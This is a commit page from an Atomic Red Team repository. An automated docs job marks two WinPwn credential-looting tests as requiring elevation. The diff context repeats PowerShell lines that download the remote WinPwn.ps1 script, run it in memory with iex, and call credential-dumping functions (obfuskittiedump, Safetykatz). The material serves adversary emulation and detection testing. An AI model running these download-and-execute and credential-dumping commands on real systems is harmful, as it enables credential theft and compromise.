security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-08-08 21:09:36 +00:00
parent 2b2d75f33c
commit 464291478b
2 changed files with 10 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+8
View File
@@ -26374,6 +26374,7 @@ defense-evasion:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
@@ -26385,6 +26386,7 @@ defense-evasion:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
T1211:
technique:
x_mitre_platforms:
@@ -40633,6 +40635,7 @@ privilege-escalation:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
@@ -40644,6 +40647,7 @@ privilege-escalation:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
T1574.012:
technique:
x_mitre_platforms:
@@ -63222,6 +63226,7 @@ persistence:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
@@ -63233,6 +63238,7 @@ persistence:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
T1574.012:
technique:
x_mitre_platforms:
@@ -99089,6 +99095,7 @@ initial-access:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
- name: WinPwn - Loot local Credentials - Safetykatz
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
description: Loot local Credentials - Safetykatz technique via function of WinPwn
@@ -99100,6 +99107,7 @@ initial-access:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
elevation_required: true
exfiltration:
T1567:
technique:
atomics/T1078.003/T1078.003.md
+2 -2
View File
@@ -109,7 +109,7 @@ Loot local Credentials - powerhell kittie technique via function of WinPwn
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
@@ -139,7 +139,7 @@ Loot local Credentials - Safetykatz technique via function of WinPwn
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell